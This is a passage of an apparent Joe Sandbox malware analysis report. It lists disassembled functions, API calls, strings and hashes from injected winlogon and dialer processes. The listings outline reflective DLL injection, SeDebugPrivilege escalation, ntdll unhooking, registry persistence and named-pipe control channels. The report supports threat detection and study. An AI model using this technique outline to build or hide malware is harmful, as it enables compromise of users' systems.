Instruction Fuzzy Hash: CF014C32624AD0CAD705EFA6E90428EBBA1FB8DF82F05443AEE4D43719DE38C051C740

Function 000001E8589C2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 000001E8589C2A9C
GetLastError.KERNEL32 ref: 000001E8589C2B27

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction ID: ca626266aa0a7b474a878b61d5899873dc42c35356b0549f9cccd0328b52c02c
Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction Fuzzy Hash: 23918C72620AD0C9F7659FA5D8903EDFFA0BB45B88F54412BDE0E67A95DE36C482C700

Function 000001E8589B7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001E8589B798C
GetCurrentThreadId.KERNEL32 ref: 000001E8589B799A
GetCurrentProcessId.KERNEL32 ref: 000001E8589B79A6
QueryPerformanceCounter.KERNEL32 ref: 000001E8589B79B6

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction ID: 276b10aab837e175542a230bfec2f0a123e9c9319c4b0de011574a2981c74ca1
Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction Fuzzy Hash: 5E111836721F81CAEB00DBA0E8543AC73A4FB19759F440E36DE6D867A5DF78D1988380

Function 000001E8589B253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001E8589B2620
StrCpyW.SHLWAPI ref: 000001E8589B2639

Strings

\\.\pipe\, xrefs: 000001E8589B262B

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction ID: 0b3dc21db449fcbf1c19d302490e59a14833865d5b2b70b353a7510e9e64bdbc
Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction Fuzzy Hash: 9771BF362287C1CDE6249AA9D8843EEF791FF89B86F440037DD0E53B89DE35D5418704

Function 000001E858989E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000001E858989EB7

Strings

MOC, xrefs: 000001E858989E7C
RCC, xrefs: 000001E858989E85

Memory Dump Source

Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 613368ca26f5213a448d05eae5b26de1d91f394644821e2679e3739e87edce54
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: 07612633620A86CAEB24DF65D4403DDBBA0FB44B88F144226EE4E17B99DF38D595CB00

Function 000001E8589B2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001E8589B2416
StrCpyW.SHLWAPI ref: 000001E8589B242D

Strings

\\.\pipe\, xrefs: 000001E8589B2421

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction ID: db0d46813ac5e8fd5f39f756d67a1fcb3148512911a86185a8375fd33465d585
Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction Fuzzy Hash: 8B51D03222C3C1C9E665DAA9E4583EEF792FB85792F440136DE5E03B99CE39C9048740

Function 000001E8589C26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001E8589C2807
GetLastError.KERNEL32 ref: 000001E8589C2829

Strings

U, xrefs: 000001E8589C27B3

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction ID: 86a7781e38c697fc0abcbd8b7a322b6ea8dd4ce0b7b2c3ea935c5dab76c89125
Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction Fuzzy Hash: 83415C72625A80C6EB209B65E8443EDFBA1FB98B94F504136EE4E87794EF39C441CB40

Function 000001E8589B94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001E8589B94F0
RaiseException.KERNEL32 ref: 000001E8589B9531

Strings

csm, xrefs: 000001E8589B951E

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction ID: b3421d11e61861fdfaec7805ab92e2b149d9a2defd5c3d3a43f6ba353e8bbdff
Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction Fuzzy Hash: D7112B32228B8086EB618B15E44039EB7E5FB88B95F584236EE8C07758EF3DC551CB00

Function 000001E858987356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000001E85898737C

Strings

riptor at (, xrefs: 000001E858987364
ierarchy Descriptor', xrefs: 000001E858987381

Memory Dump Source

Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd

Similarity

API ID: __std_exception_copy
String ID: ierarchy Descriptor'$riptor at (
API String ID: 592178966-758928094
Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction ID: ec66882b4d3ae1b64dd5078d85d2ddc26122b5e01e13c0459ee6ee22340de03e
Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction Fuzzy Hash: 12E08671650B85D0EF018F21E8402DC73A1DF58B64F8891339D5C06311FE38D1E9C300

Function 000001E8589873B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000001E8589873D8

Strings

Locator', xrefs: 000001E8589873DD
riptor at (, xrefs: 000001E8589873C0

Memory Dump Source

Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd

Similarity

API ID: __std_exception_copy
String ID: Locator'$riptor at (
API String ID: 592178966-4215709766
Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction ID: 51b56e7d7da7883d564ff1d8aa55c5c33bcb232568c085f55078eb698fd1127b
Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction Fuzzy Hash: 3CE08C71A20B88C4EF028F21E8802DCB3A1EB68B64FC89133CE4C06311EE38D1E9C300

Function 000001E8589B1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E8589B1C2D
HeapAlloc.KERNEL32 ref: 000001E8589B1C3B
GetProcessHeap.KERNEL32 ref: 000001E8589B1C77
HeapFree.KERNEL32 ref: 000001E8589B1C85

Part of subcall function 000001E8589B152C: StrCmpIW.SHLWAPI ref: 000001E8589B155D

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction ID: e1d6aeabad6ccef3ff38877d506157880c324e0593935b115836214f7ad20565
Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction Fuzzy Hash: BE116035725BC4C5EA15DB66E8043ADB7A1FB89FC1F18403ADE4D53765DE39C8428300

Function 000001E8589B1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E8589B126E
HeapAlloc.KERNEL32 ref: 000001E8589B127D
GetProcessHeap.KERNEL32 ref: 000001E8589B1297
HeapAlloc.KERNEL32 ref: 000001E8589B12A8

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction ID: caadc08de9d2bac00fe2f05b454c5bd5b931daf7e9d403db42940cda31ad44e3
Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction Fuzzy Hash: CEE03975721684C6EB058BA2D80838ABFE1EB89B06F0480288D0907351DF7EC499C750

Analysis Process: dialer.exePID: 7464, Parent PID: 7376COMMON

Execution Graph

Execution Coverage:	48.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	227
Total number of Limit Nodes:	23

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140001F2C: StrCpyW.SHLWAPI ref: 0000000140001F5D
Part of subcall function 0000000140001F2C: StrCatW.SHLWAPI ref: 0000000140001F6B
Part of subcall function 0000000140001F2C: GetModuleHandleW.KERNEL32 ref: 0000000140001F74
Part of subcall function 0000000140001F2C: GetCurrentProcess.KERNEL32 ref: 0000000140001F94
Part of subcall function 0000000140001F2C: K32GetModuleInformation.KERNEL32 ref: 0000000140001FA8
Part of subcall function 0000000140001F2C: CreateFileW.KERNELBASE ref: 0000000140001FD8
Part of subcall function 0000000140001F2C: CreateFileMappingW.KERNELBASE ref: 0000000140002002
Part of subcall function 0000000140001F2C: MapViewOfFile.KERNELBASE ref: 0000000140002025
Part of subcall function 0000000140001F2C: lstrcmpiA.KERNEL32 ref: 000000014000207B
Part of subcall function 0000000140001F2C: CloseHandle.KERNELBASE ref: 00000001400020E7
Part of subcall function 0000000140001F2C: CloseHandle.KERNEL32 ref: 00000001400020F0
Part of subcall function 0000000140001F2C: FreeLibrary.KERNEL32 ref: 00000001400020F9

Part of subcall function 0000000140001F2C: VirtualProtect.KERNELBASE ref: 00000001400020AE
Part of subcall function 0000000140001F2C: VirtualProtect.KERNELBASE ref: 00000001400020DE

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
GetLastError.KERNEL32 ref: 0000000140002312
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
LocalFree.KERNEL32 ref: 0000000140002408
RegCreateKeyExW.KERNELBASE ref: 000000014000243E
GetCurrentProcessId.KERNEL32 ref: 0000000140002448
RegSetValueExW.KERNELBASE ref: 000000014000246F
RegCloseKey.KERNELBASE ref: 0000000140002479
RegCloseKey.ADVAPI32 ref: 0000000140002483
CreateThread.KERNELBASE ref: 00000001400024A4
GetProcessHeap.KERNEL32 ref: 00000001400024AA
HeapAlloc.KERNEL32 ref: 00000001400024B9
CreateThread.KERNELBASE ref: 00000001400024E8
CreateThread.KERNELBASE ref: 0000000140002509
SleepEx.KERNELBASE ref: 0000000140002511

Strings

kernel32.dll, xrefs: 0000000140002283
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 00000001400023DE
SOFTWARE\dialerconfig, xrefs: 0000000140002399
pid, xrefs: 000000014000241B
svc64, xrefs: 0000000140002452
ntdll.dll, xrefs: 0000000140002277
SeDebugPrivilege, xrefs: 00000001400022C9
DLL, xrefs: 0000000140002321

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
API String ID: 4177739653-1130149537
Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740

Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001400018AC: OpenProcess.KERNEL32(?,?,?,000000014000110E), ref: 00000001400018CA
Part of subcall function 00000001400018AC: IsWow64Process.KERNEL32(?,?,?,000000014000110E), ref: 00000001400018E0
Part of subcall function 00000001400018AC: CloseHandle.KERNELBASE(?,?,?,000000014000110E), ref: 00000001400018FB

OpenProcess.KERNEL32 ref: 000000014000112C
OpenProcess.KERNEL32 ref: 000000014000114B
K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001170
PathFindFileNameW.SHLWAPI ref: 000000014000117E
lstrlenW.KERNEL32 ref: 000000014000118A
StrCpyW.SHLWAPI ref: 00000001400011A1
CloseHandle.KERNEL32 ref: 00000001400011AD
StrCmpIW.SHLWAPI ref: 00000001400011E2
NtQueryInformationProcess.NTDLL ref: 0000000140001216
OpenProcessToken.ADVAPI32 ref: 0000000140001240
GetTokenInformation.KERNELBASE ref: 000000014000126C
GetLastError.KERNEL32 ref: 0000000140001276
LocalAlloc.KERNEL32 ref: 0000000140001289
GetTokenInformation.KERNELBASE ref: 00000001400012B5
GetSidSubAuthorityCount.ADVAPI32 ref: 00000001400012C2
GetSidSubAuthority.ADVAPI32 ref: 00000001400012D1
LocalFree.KERNEL32 ref: 00000001400012E9
CloseHandle.KERNEL32 ref: 00000001400012FD
StrStrA.SHLWAPI ref: 00000001400013A7
VirtualAllocEx.KERNELBASE ref: 000000014000140E
WriteProcessMemory.KERNELBASE ref: 0000000140001431
WaitForSingleObject.KERNEL32 ref: 000000014000147D
GetExitCodeThread.KERNEL32 ref: 0000000140001493
CloseHandle.KERNELBASE ref: 00000001400014AB
CloseHandle.KERNEL32 ref: 00000001400014B4

Strings

@, xrefs: 0000000140001401
MSBuild.exe, xrefs: 00000001400011B8
dialer.exe, xrefs: 00000001400011CC
ReflectiveDllMain, xrefs: 000000014000139D

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
API String ID: 2561231171-3753927220
Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000000014000150B
HeapAlloc.KERNEL32 ref: 000000014000151E
GetProcessHeap.KERNEL32 ref: 000000014000152C
HeapAlloc.KERNEL32 ref: 000000014000153D
K32EnumProcesses.KERNEL32 ref: 0000000140001557
OpenProcess.KERNEL32 ref: 0000000140001585
K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
ReadProcessMemory.KERNELBASE ref: 00000001400015E1
CloseHandle.KERNELBASE ref: 000000014000161D
GetProcessHeap.KERNEL32 ref: 000000014000162F
HeapFree.KERNEL32 ref: 000000014000163D
GetProcessHeap.KERNEL32 ref: 0000000140001643
HeapFree.KERNEL32 ref: 0000000140001651

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 0000000140001F5D
StrCatW.SHLWAPI ref: 0000000140001F6B
GetModuleHandleW.KERNEL32 ref: 0000000140001F74
GetCurrentProcess.KERNEL32 ref: 0000000140001F94
K32GetModuleInformation.KERNEL32 ref: 0000000140001FA8
CreateFileW.KERNELBASE ref: 0000000140001FD8
CreateFileMappingW.KERNELBASE ref: 0000000140002002
MapViewOfFile.KERNELBASE ref: 0000000140002025
lstrcmpiA.KERNEL32 ref: 000000014000207B
VirtualProtect.KERNELBASE ref: 00000001400020AE
VirtualProtect.KERNELBASE ref: 00000001400020DE
CloseHandle.KERNELBASE ref: 00000001400020E7
CloseHandle.KERNEL32 ref: 00000001400020F0
FreeLibrary.KERNEL32 ref: 00000001400020F9

Strings

C:\Windows\System32\, xrefs: 0000000140001F4F
.text, xrefs: 0000000140002074

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140001B54: AllocateAndInitializeSid.ADVAPI32 ref: 0000000140001BA3
Part of subcall function 0000000140001B54: SetEntriesInAclW.ADVAPI32 ref: 0000000140001BEB
Part of subcall function 0000000140001B54: LocalAlloc.KERNEL32 ref: 0000000140001BFB
Part of subcall function 0000000140001B54: InitializeSecurityDescriptor.ADVAPI32 ref: 0000000140001C0F
Part of subcall function 0000000140001B54: SetSecurityDescriptorDacl.ADVAPI32 ref: 0000000140001C26
Part of subcall function 0000000140001B54: CreateNamedPipeW.KERNELBASE ref: 0000000140001C67

Sleep.KERNEL32 ref: 0000000140002C1D
ConnectNamedPipe.KERNELBASE ref: 0000000140002C2A
ReadFile.KERNELBASE ref: 0000000140002C4D
WriteFile.KERNEL32 ref: 0000000140002C7B
Sleep.KERNEL32 ref: 0000000140002C88
DisconnectNamedPipe.KERNELBASE ref: 0000000140002C91

Strings

\\.\pipe\dialerchildproc64, xrefs: 0000000140002C05
M, xrefs: 0000000140002C6E

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\dialerchildproc64
API String ID: 2203880229-3489460547
Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140001B54: AllocateAndInitializeSid.ADVAPI32 ref: 0000000140001BA3
Part of subcall function 0000000140001B54: SetEntriesInAclW.ADVAPI32 ref: 0000000140001BEB
Part of subcall function 0000000140001B54: LocalAlloc.KERNEL32 ref: 0000000140001BFB
Part of subcall function 0000000140001B54: InitializeSecurityDescriptor.ADVAPI32 ref: 0000000140001C0F
Part of subcall function 0000000140001B54: SetSecurityDescriptorDacl.ADVAPI32 ref: 0000000140001C26
Part of subcall function 0000000140001B54: CreateNamedPipeW.KERNELBASE ref: 0000000140001C67

Sleep.KERNEL32 ref: 00000001400021F5
ConnectNamedPipe.KERNELBASE ref: 0000000140002202
ReadFile.KERNEL32 ref: 0000000140002225
Sleep.KERNEL32 ref: 0000000140002246
DisconnectNamedPipe.KERNEL32 ref: 000000014000224F

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00000001400021DD

Memory Dump Source

Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_140000000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 2071455217-3440882674
Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

